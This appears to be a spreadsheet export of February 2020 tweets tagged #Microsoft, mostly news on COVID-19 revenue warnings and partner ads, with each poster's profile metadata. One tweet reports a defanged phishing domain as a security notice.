    <t>{'id': 148421857, 'id_str': '148421857', 'name': 'ayesha vohra', 'screen_name': 'ayeshavohra', 'location': '', 'description': 'In the house of lovers, the music never stops, the walls are made of songs and the floor dances. - RUMI', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 49, 'listed_count': 2, 'created_at': 'Wed May 26 17:13:33 +0000 2010', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1824,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'http://pbs.twimg.com/profile_images/2475916731/oqjtb4xh1txzoib8zlvb_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2475916731/oqjtb4xh1txzoib8zlvb_normal.jpeg', 'profile_link_color': 'B9B9B9', 'profile_sidebar_border_color': '333333', 'profile_sidebar_fill_color': '0F0F0F', 'profile_text_color': '3FD85B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 08:30:58 +0000 2020</t>
  </si>
  <si>
    <t>After Apple, #Microsoft has revised its #revenue guidelines for its January-March quarter owing to #Coronavirus (COVID-19) outbreak.
https://t.co/1iHsD4Ooen</t>
  </si>
  <si>
    <t>Thu Feb 27 08:30:17 +0000 2020</t>
  </si>
  <si>
    <t>Are you having problems with Windows 10 and need a hand?  Bring your laptop to our repair cafe and let us take a look! 
https://t.co/ciAigj2fIp
#pcproblems #windows10 #microsoft #computers #technology https://t.co/Ljbgrs9u4a</t>
  </si>
  <si>
    <t>Thu Feb 27 08:30:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cuts revenue estimates, says will feel impact of #COVID19 outbreak
https://t.co/fsioSblibi</t>
  </si>
  <si>
    <t>Thu Feb 27 08:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Support offsite telecommuting, work-from-home, virtual file sharing, online collaboration, and workflow collaboration with the help of SharePoint, Microsoft Teams and #Microsoft #Office. See how we can help: https://t.co/ohU27n1Ngs
#websynergies #websynergiessingapore https://t.co/PkBvqNzk9c</t>
  </si>
  <si>
    <t>{'id': 97587616, 'id_str': '97587616', 'name': 'Web Synergies', 'screen_name': 'WebSynergies', 'location': 'Singapore, India', 'description': "Digital solutions for today's competitive &amp; continuously changing businesses. #Digital #AI #Cloud #Azure #ChatBots #blockchain #IoT #AR/VR #Data #Analytics #ML", 'url': 'https://t.co/oen4GH2p98', 'entities': {'url': {'urls': [{'url': 'https://t.co/oen4GH2p98', 'expanded_url': 'http://www.websynergies.biz', 'display_url': 'websynergies.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 677, 'friends_count': 39, 'listed_count': 33, 'created_at': 'Fri Dec 18 03:27:43 +0000 2009', 'favourites_count': 190, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 30013, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FAFAFA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/454835824421396480/KygtqiFV_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/454835824421396480/KygtqiFV_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/97587616/1572418135', 'profile_link_color': 'E83D12', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'A5A9AD', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 08:29:12 +0000 2020</t>
  </si>
  <si>
    <t>For Quality work Visit : https://t.co/K5RgJVTzLb
#softwaredevelopment #SoftwareDeveloper #mobileapps #Android #AzureDevOps #Microsoft #SearchEngineOptimization #socialmediamarketing #DigitalMarketing #ITConsulting #Itworld https://t.co/ab2vOOGdn3</t>
  </si>
  <si>
    <t>{'id': 1200348349330685954, 'id_str': '1200348349330685954', 'name': 'acetechus', 'screen_name': 'acetechus', 'location': 'United States ', 'description': 'Acetech is a leading software development company. Acetech has over a decade of rich experience in delivering critical software solutions to its clients in USA,', 'url': 'https://t.co/9zKZuh3UDx', 'entities': {'url': {'urls': [{'url': 'https://t.co/9zKZuh3UDx', 'expanded_url': 'http://www.acetechus.com/', 'display_url': 'acetechus.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Fri Nov 29 09:38:53 +0000 2019', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 93, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222064818468745216/qeNzJTMu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222064818468745216/qeNzJTMu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1200348349330685954/1580197934',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</si>
  <si>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08:28:37 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft's #rival to @googleearth is #Microsoft #World</t>
  </si>
  <si>
    <t>{'id': 1217654120284188672, 'id_str': '1217654120284188672', 'name': 'Unlisted Thoughts', 'screen_name': 'Unlisted_Thinks', 'location': 'The Great State of Australia', 'description': "All thoughts are my own (he/him). There's a reason it's called #unlisted. Warning: fines apply. #comedyofrandomness #stenate Est. 16/01/2020", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Thu Jan 16 03:45:55 +0000 2020', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1122, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231397181682114560/uk9wtn3X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231397181682114560/uk9wtn3X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1217654120284188672/1582422942',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</si>
  <si>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08:28:01 +0000 2020</t>
  </si>
  <si>
    <t>Google Really Doesn't Want You to Use Microsoft Edge. Here's Why https://t.co/qvXenAO1Sc #browser, #google, #microsoft, c</t>
  </si>
  <si>
    <t>Thu Feb 27 08:24:22 +0000 2020</t>
  </si>
  <si>
    <t>More details on the next gen gaming console (Xbox Series X) from Microsoft - 12 teraflops of GPU performance is mightily impressive.. #videogaming #gaming #microsoft #gpu #xbox https://t.co/n6KE3aklzo</t>
  </si>
  <si>
    <t>{'id': 64712337, 'id_str': '64712337', 'name': 'Bryan Hill', 'screen_name': 'bryahill', 'location': 'London, UK', 'description': "My loves: wife/family/friends, media/IP/analogue-digital, useful knowledge/useless trivia, golf and finding out what I don't know and sharing it.", 'url': 'http://t.co/HTsCHFbG', 'entities': {'url': {'urls': [{'url': 'http://t.co/HTsCHFbG', 'expanded_url': 'http://uk.linkedin.com/in/bryanhill1', 'display_url': 'uk.linkedin.com/in/bryanhill1', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 549, 'listed_count': 13, 'created_at': 'Tue Aug 11 13:26:53 +0000 2009', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1808,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'http://pbs.twimg.com/profile_images/3033723007/07cf02429f93f84eb87ea6ebff49cc77_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3033723007/07cf02429f93f84eb87ea6ebff49cc77_normal.jpeg', 'profile_link_color': '89C9FA',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</si>
  <si>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Thu Feb 27 08:22:55 +0000 2020</t>
  </si>
  <si>
    <t>Here we go again :-)  #ignite #microsoft @ Bella Center https://t.co/6CyyhCIxs5</t>
  </si>
  <si>
    <t>{'id': 1018247665, 'id_str': '1018247665', 'name': 'Henrik Frands Wojcik', 'screen_name': 'henrikwojcik', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 213, 'listed_count': 0, 'created_at': 'Mon Dec 17 20:15:02 +0000 2012', 'favourites_count': 628, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 686,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'http://pbs.twimg.com/profile_images/1192293139521974272/GUaWJFiI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192293139521974272/GUaWJFiI_normal.jpg',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</si>
  <si>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08:20:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says virus hurting supply chain more than expected https://t.co/RI7Ls6WzN1</t>
  </si>
  <si>
    <t>{'id': 2471009922, 'id_str': '2471009922', 'name': 'TechXplore', 'screen_name': 'TechXplore_com', 'location': 'US', 'description': 'The latest engineering, technology and research news.', 'url': 'http://t.co/sN50CffJ29', 'entities': {'url': {'urls': [{'url': 'http://t.co/sN50CffJ29', 'expanded_url': 'http://techxplore.com', 'display_url': 'techxplore.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10732, 'friends_count': 10, 'listed_count': 413, 'created_at': 'Wed Apr 30 14:03:30 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9301,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'http://pbs.twimg.com/profile_images/462146809729519616/Ri81vCkn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/462146809729519616/Ri81vCkn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2471009922/1399019374', 'profile_link_color': '09416C',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</si>
  <si>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08:19:05 +0000 2020</t>
  </si>
  <si>
    <t>Breaking down the new Web developer tools in Internet Explorer 11 - https://t.co/NHEyXhls0e #internet_explorer #microsoft https://t.co/IGajg6AlBf</t>
  </si>
  <si>
    <t>{'id': 601578169, 'id_str': '601578169', 'name': 'Else if', 'screen_name': 'getelseif', 'location': 'Sydney, Australia', 'description': 'http://t.co/CIlgMavXLE is the hangout place for programmers, developers and hackers. Come and join the growing community!', 'url': 'http://t.co/xF8vOakRWt', 'entities': {'url': {'urls': [{'url': 'http://t.co/xF8vOakRWt', 'expanded_url': 'http://www.elseif.net', 'display_url': 'elseif.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/CIlgMavXLE', 'expanded_url': 'http://Elseif.net', 'display_url': 'Elseif.net', 'indices': [0, 22]}]}}, 'protected': False, 'followers_count': 1744, 'friends_count': 1804, 'listed_count': 405, 'created_at': 'Thu Jun 07 05:12:14 +0000 2012', 'favourites_count': 6899, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 55800,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'http://pbs.twimg.com/profile_images/938745999215935488/EJ7me5-V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938745999215935488/EJ7me5-V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/601578169/1479343154',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</si>
  <si>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08:15:20 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 08:15:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Joins Apple, HP in Scrapping Outlooks on Virus
#Microsoft Corp. became the latest tech giant to reduce its quarterly outlook based on the outbreak of a novel #coronavirus thats slowing... Read More at - https://t.co/nrnYqo7zGd
#BusinessLiveME #BusinessNews #BLME https://t.co/x29rzIXUnA</t>
  </si>
  <si>
    <t>{'id': 2449385540, 'id_str': '2449385540', 'name': 'BusinessLive ME', 'screen_name': 'BusinessLiveME', 'location': 'Muscat, Oman', 'description': 'Business Live ME engages decision makers across the region. Our reportage, honed over 25 years, constantly aims to be accurate &amp; unrivalled.', 'url': 'https://t.co/cxjwQEFKqQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/cxjwQEFKqQ', 'expanded_url': 'http://www.businessliveme.com', 'display_url': 'businessliveme.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2657, 'friends_count': 396, 'listed_count': 14, 'created_at': 'Thu Apr 17 09:13:08 +0000 2014', 'favourites_count': 500, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5074,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'http://pbs.twimg.com/profile_images/1052440310305968128/ewLr-8lR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052440310305968128/ewLr-8lR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2449385540/1539776270', 'profile_link_color': 'DD2E44',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</si>
  <si>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Feb 27 08:13:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Gold certified partners can assist you with support. Give us a call 254 20 272 8348 / +254 726 129 900. Like comment and follow. #digitaltransformation #microsoftdynamicscrm #software #d365 #demo #crmsystem #crm #microsoft #office365 #azure #smallbusinessowners #market https://t.co/t0sTR63uBC</t>
  </si>
  <si>
    <t>{'id': 1425322932, 'id_str': '1425322932', 'name': 'Impax Business Solutions', 'screen_name': 'ImpaxLtd', 'location': 'Nairobi , Kenya', 'description': 'We are an information systems consultancy company and a Microsoft Gold Certified Partner based in Nairobi, Kenya with operations across Africa.', 'url': 'http://t.co/cMf7eaEvd9', 'entities': {'url': {'urls': [{'url': 'http://t.co/cMf7eaEvd9', 'expanded_url': 'http://www.impaxafrica.com', 'display_url': 'impaxafrica.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 259, 'friends_count': 346, 'listed_count': 1, 'created_at': 'Mon May 13 11:56:47 +0000 2013', 'favourites_count': 464, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 505,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'http://pbs.twimg.com/profile_images/958605204710150144/azCS26Hl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958605204710150144/azCS26Hl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1425322932/1524648890',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</si>
  <si>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08:11:22 +0000 2020</t>
  </si>
  <si>
    <t>Stream data, update dashboards, include animations and more all in real time!  Learn how here  https://t.co/5TrxOAYffN @JamesSerra #MSPartners #Microsoft #PowerBI</t>
  </si>
  <si>
    <t>{'id': 3105544688, 'id_str': '3105544688', 'name': 'Umbrellar', 'screen_name': 'umbrellar', 'location': 'New Zealand', 'description': 'Helping Kiwi businesses navigate an ever-changing tech landscape.', 'url': 'https://t.co/kt2KTRlDBm', 'entities': {'url': {'urls': [{'url': 'https://t.co/kt2KTRlDBm', 'expanded_url': 'http://www.umbrellar.com', 'display_url': 'umbrellar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 673, 'listed_count': 4, 'created_at': 'Mon Mar 23 23:14:51 +0000 2015', 'favourites_count': 1295, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 902,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'http://pbs.twimg.com/profile_images/1226960660396834816/R84pCINC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226960660396834816/R84pCINC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3105544688/1547091437',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</si>
  <si>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08:11:13 +0000 2020</t>
  </si>
  <si>
    <t>Know the signsis outdated accounting software putting your business at risk? Download the free Business Owner's Guide to Replacing Accounting Software.   #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/zxkfF91dIs</t>
  </si>
  <si>
    <t>Thu Feb 27 08:10:00 +0000 2020</t>
  </si>
  <si>
    <t>Capacity planning for Azure Stack Hub
https://t.co/2iIebZuPOi #microsoft #azurestack #azurestackhub</t>
  </si>
  <si>
    <t>Thu Feb 27 08:03:52 +0000 2020</t>
  </si>
  <si>
    <t>Financial Times: #Microsoft warns coronavirus hurting #Windows and Surface - Tech group joins Apple in suffering from uncertainty over slow restart to supply chain.</t>
  </si>
  <si>
    <t>{'id': 962713598572232705, 'id_str': '962713598572232705', 'name': 'Michal Stupavsky, CFA', 'screen_name': 'MichalStupavsky', 'location': 'Praha, ÄŒeskÃ¡ republika', 'description': 'Investment Strategist at Conseq Investment Management â”‚ Co-author of the first Czech book about behavioral finance 21st Centrury Investor â”‚ stupavsky@conseq.cz', 'url': 'https://t.co/fA2JtODJIt', 'entities': {'url': {'urls': [{'url': 'https://t.co/fA2JtODJIt', 'expanded_url': 'http://www.conseq.cz', 'display_url': 'conseq.cz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 474, 'friends_count': 300, 'listed_count': 6, 'created_at': 'Sun Feb 11 15:43:03 +0000 2018', 'favourites_count': 3700, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3963, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/967801918851608578/GNiRixeV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/967801918851608578/GNiRixeV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/962713598572232705/1551361978',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</si>
  <si>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08:03:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says it will likely miss its guidance for its More Personal Computing segment, which includes Windows, due to COVID-19's impact on its supply chain https://t.co/od57LYr9xv</t>
  </si>
  <si>
    <t>Thu Feb 27 08:01:11 +0000 2020</t>
  </si>
  <si>
    <t>The top ten brands Worldwide!
https://t.co/FgfPKIr7nm
#ixtract #StefanFichtel #Infographic #Dataviz #VisualStorytelling #Google #cocacola #intel #IBM #Microsoft #Mercedes #Samsung #Toyota #HP #Ford #Disney #Marlboro #Nokia #AT&amp;amp;T #Apple #Amazone #Facebook #Visa https://t.co/l3cQaaCkvo</t>
  </si>
  <si>
    <t>{'id': 235224482, 'id_str': '235224482', 'name': 'ixtract', 'screen_name': 'ixtract', 'location': '', 'description': 'Berlin', 'url': 'https://t.co/salqd2EGpl', 'entities': {'url': {'urls': [{'url': 'https://t.co/salqd2EGpl', 'expanded_url': 'http://www.ixtract.de', 'display_url': 'ixtract.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 84, 'friends_count': 370, 'listed_count': 3, 'created_at': 'Fri Jan 07 17:22:02 +0000 2011', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 383,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'http://pbs.twimg.com/profile_images/378800000604972533/2c3f6f217c07e76085f99431b9a55d2e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000604972533/2c3f6f217c07e76085f99431b9a55d2e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/235224482/1519319593', 'profile_link_color': 'ADADAD',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</si>
  <si>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Feb 27 08:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Now generally available, #Microsoft Communication #Compliance in #Microsoft365. Communication Compliance uses machine learning to proactively surface careless or negligent communication that may put your organization at risk. https://t.co/6bgHmPDzEu</t>
  </si>
  <si>
    <t>{'id': 719057930197278720, 'id_str': '719057930197278720', 'name': 'ICTPower', 'screen_name': 'ictpower_it', 'location': 'Italia', 'description': 'Tutto il potere della tecnologia in un unico portale', 'url': 'https://t.co/MICZc76XoA', 'entities': {'url': {'urls': [{'url': 'https://t.co/MICZc76XoA', 'expanded_url': 'http://www.ictpower.it', 'display_url': 'ictpower.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 222, 'friends_count': 57, 'listed_count': 43, 'created_at': 'Sun Apr 10 07:02:24 +0000 2016', 'favourites_count': 186, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1754, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/744188795742994436/xzqaKPh-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/744188795742994436/xzqaKPh-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/719057930197278720/1471428794',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</si>
  <si>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08:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Are you using #Azure PaaS offerings? You probably do, but how about integrating them with your network?
Let #Microsoft #MVP @ericberg_de show you what things you need to consider and understand before proceeding. You can watch his session for free at the upcoming #AzureFest event https://t.co/7rleqkPx5j</t>
  </si>
  <si>
    <t>Thu Feb 27 08:00:11 +0000 2020</t>
  </si>
  <si>
    <t>Now generally available, #Microsoft Communication #Compliance in #Microsoft365. Communication Compliance uses machine learning to proactively surface careless or negligent communication that may put your organization at risk. https://t.co/8k7e0WJkms</t>
  </si>
  <si>
    <t>{'id': 220800629, 'id_str': '220800629', 'name': 'Nicola Ferrini', 'screen_name': 'nicolaferrini', 'location': 'Roma', 'description': 'Microsoft MVP - Trainer -  Virtualization Expert - IT Enthusiast', 'url': 'https://t.co/FVCLWR8V51', 'entities': {'url': {'urls': [{'url': 'https://t.co/FVCLWR8V51', 'expanded_url': 'http://www.nicolaferrini.it', 'display_url': 'nicolaferrini.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 547, 'friends_count': 255, 'listed_count': 256, 'created_at': 'Sun Nov 28 21:37:22 +0000 2010', 'favourites_count': 1859, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10672,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'http://pbs.twimg.com/profile_images/745638592320507904/QXGrDHfx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/745638592320507904/QXGrDHfx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/220800629/1470503865',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</si>
  <si>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08:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Learn about intelligent telecommunications &amp;amp; see how the capabilities of #Microsoft solutions have enabled transformational business outcomes for #Telefonica, #Vodafone, #Telstra, #Telia, and Deutsche Telekom - Steve Franklin https://t.co/jSOv7adNsl</t>
  </si>
  <si>
    <t>Thu Feb 27 07:59:01 +0000 2020</t>
  </si>
  <si>
    <t>Tired of thousands of "vanilla" #Dynamics365 providers?  
Amerdian is a different type of #Microsoft #CRM &amp;amp; #ERP Gold Partner. 
Check us out risk-free today. https://t.co/npAEv39qGN
#MicrosoftDynamics #SupplyChain #SupplyChainManagement #ProjectManagement #Dynamics365BC #Data https://t.co/5p2lrKbVsb</t>
  </si>
  <si>
    <t>{'id': 1884014178, 'id_str': '1884014178', 'name': 'Amerdian', 'screen_name': 'AmerdianUS', 'location': 'US and India', 'description': 'Providing 24*7 Resources &amp; Expertise in #Microsoft #Dynamics365 NAV #SharePoint and Mobility Solutions for your business.   #ERP', 'url': 'http://t.co/0qcPSpA3tM', 'entities': {'url': {'urls': [{'url': 'http://t.co/0qcPSpA3tM', 'expanded_url': 'http://www.amerdian.com', 'display_url': 'amerdian.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 163, 'friends_count': 276, 'listed_count': 0, 'created_at': 'Thu Sep 19 18:52:53 +0000 2013', 'favourites_count': 77, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 524,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'http://pbs.twimg.com/profile_images/1155938020060737539/86HNRJCe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155938020060737539/86HNRJCe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1884014178/1564510008',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</si>
  <si>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07:58:29 +0000 2020</t>
  </si>
  <si>
    <t>We are super excited to announce that #Zaggle is part of #Microsofts 100X100X100 program which will bring together 100 committed #companies and 100 early and growth #startups that have enterprise-ready solutions to offer. More details here - https://t.co/d8wx5BjpoS</t>
  </si>
  <si>
    <t>{'id': 4276185206, 'id_str': '4276185206', 'name': 'Zaggle', 'screen_name': 'zaggleapp', 'location': 'Hyderabad, India', 'description': 'Zaggle is a fintech company offering 100% digitized solutions to corporates.  \nVisit https://t.co/vPG1eznBCn and https://t.co/Zvd9xObEOz to know more about us', 'url': 'https://t.co/WgcxSRobGs', 'entities': {'url': {'urls': [{'url': 'https://t.co/WgcxSRobGs', 'expanded_url': 'https://www.zaggle.in/', 'display_url': 'zaggle.in', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/vPG1eznBCn', 'expanded_url': 'http://www.zaggle.in', 'display_url': 'zaggle.in', 'indices': [85, 108]}, {'url': 'https://t.co/Zvd9xObEOz', 'expanded_url': 'http://corporate.zaggle.in', 'display_url': 'corporate.zaggle.in', 'indices': [113, 136]}]}}, 'protected': False, 'followers_count': 533, 'friends_count': 338, 'listed_count': 2, 'created_at': 'Wed Nov 18 07:02:18 +0000 2015', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1874,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'http://pbs.twimg.com/profile_images/1032184668320358401/Nqyc2AD1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032184668320358401/Nqyc2AD1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4276185206/1549029483',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</si>
  <si>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07:57:39 +0000 2020</t>
  </si>
  <si>
    <t>#phishing #microsoft https://t.co/mo2QSFeN99 a few domains over there are part of a phishing campaign , it redirects to this domain expodigitals[.]xyz @James_inthe_box @PhishLabs</t>
  </si>
  <si>
    <t>{'id': 712104051836473344, 'id_str': '712104051836473344', 'name': 'Sirius_malware', 'screen_name': 'sirius_malware', 'location': 'Costa Rica | UK | Ireland', 'description': 'Security Analyst @workday Former @intel and @microsoft security analyst |Program Committee @firstdotorg |tweets are my own doesnâ€™t represent my employer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1249, 'friends_count': 2449, 'listed_count': 62, 'created_at': 'Tue Mar 22 02:30:11 +0000 2016', 'favourites_count': 16481, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7517,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'http://pbs.twimg.com/profile_images/1229139071076896773/zLIYYG0x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229139071076896773/zLIYYG0x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/712104051836473344/1581627626', 'profile_link_color': '8B0000',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</si>
  <si>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07:52:43 +0000 2020</t>
  </si>
  <si>
    <t>A fantastic 2 days at the Education Strategy Forum in Oxford;  34 1on1 meetings with University leaders, 2 speed dating sessions with 250 education leaders and a conference keynote presentation.  A really great use of everyone's time!
#microsoft #educati...https://t.co/ptSGR6b2RX</t>
  </si>
  <si>
    <t>{'id': 38618097, 'id_str': '38618097', 'name': 'Martin Neale', 'screen_name': 'martinneale', 'location': 'Basingstoke', 'description': 'Martin Neale is founder and CEO of ICS AI.  ICS build Artificial Intelligence Solutions, FLEX AI and are a Microsoft AI Inner Circle partner.', 'url': 'https://t.co/rS19IYQend', 'entities': {'url': {'urls': [{'url': 'https://t.co/rS19IYQend', 'expanded_url': 'http://www.ics.ai', 'display_url': 'ics.ai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 230, 'friends_count': 279, 'listed_count': 16, 'created_at': 'Fri May 08 06:04:29 +0000 2009', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 321,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'http://pbs.twimg.com/profile_images/746696766/martin_neale_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/746696766/martin_neale_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38618097/1548176975',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</si>
  <si>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07:50:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says coronavirus outbreak will affect its Q3 projections.
https://t.co/SHaLMoEkcx</t>
  </si>
  <si>
    <t>{'id': 3035377582, 'id_str': '3035377582', 'name': 'Mashable India', 'screen_name': 'MashableIndia', 'location': '', 'description': 'Mashable is your go-to source for tech, digital culture, and entertainment content.', 'url': 'https://t.co/S3u8VEdid2', 'entities': {'url': {'urls': [{'url': 'https://t.co/S3u8VEdid2', 'expanded_url': 'http://in.mashable.com', 'display_url': 'in.mashable.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3391, 'friends_count': 5, 'listed_count': 75, 'created_at': 'Fri Feb 13 20:01:26 +0000 2015', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12664,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'http://pbs.twimg.com/profile_images/1041582716959911937/p7gSIazh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041582716959911937/p7gSIazh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3035377582/1561469259',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</si>
  <si>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07:47:16 +0000 2020</t>
  </si>
  <si>
